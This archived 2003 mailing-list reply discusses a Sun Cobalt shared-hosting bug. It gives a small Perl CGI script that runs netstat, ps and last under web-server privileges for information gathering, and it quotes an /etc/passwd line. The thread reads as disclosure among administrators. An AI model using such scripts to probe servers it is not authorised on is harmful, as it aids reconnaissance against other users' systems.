[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [cobalt-users] MAJOR BUG, Browse any directory view any file

Subject: Re: [cobalt-users] MAJOR BUG, Browse any directory view any file
From: "Fragga" <fragga@xxxxxxxxxxxx>
Date: Wed May 28 07:01:01 2003
List-id: Mailing list for users to share thoughts on Sun Cobalt products. <cobalt-users.list.cobalt.com>

> when I tried the php code I received output but no passwords are
displayed..
>
> only lines like this:
> admin:x:500:100:Administrator:/home/.users/112/admin:/bin/bash

ya passwords are shadowd /etc/shadow holds the passes, this isnt world
readable.
however its just a demonstration that u can exec anything with http privs.

u can run binarys aswell and display output like :

#!/usr/bin/perl
print "Content-type: text/html\n\n";
print "<PRE>";
print `netstat -atnp`;
print "</PRE>";
print "<PRE>";
print `ps -aux`;
print "</PRE>";
print "<PRE>";
print `last`;
print "</PRE>";

Its just examples of information gathering.

if one of your mates has an ftp account with cgi or php enabled from default
then they can gather some pretty helpful info.

fragga

Follow-Ups:
- Re: [cobalt-users] MAJOR BUG, Browse any directory view any file
  - From: William J.A. Brillinger

References:
- RE: [cobalt-users] MAJOR BUG, Browse any directory view any file
  - From: Robert Roose

Prev by Date: Re: [cobalt-users] MAJOR BUG, Browse any directory view any file
Next by Date: [cobalt-users] Cobalt Migration Utility / raqbackup.sh
Previous by thread: Re: [cobalt-users] MAJOR BUG, Browse any directory view any file
Next by thread: Re: [cobalt-users] MAJOR BUG, Browse any directory view any file

Sun Cobalt Users Message Index

Sun Cobalt Users Thread Index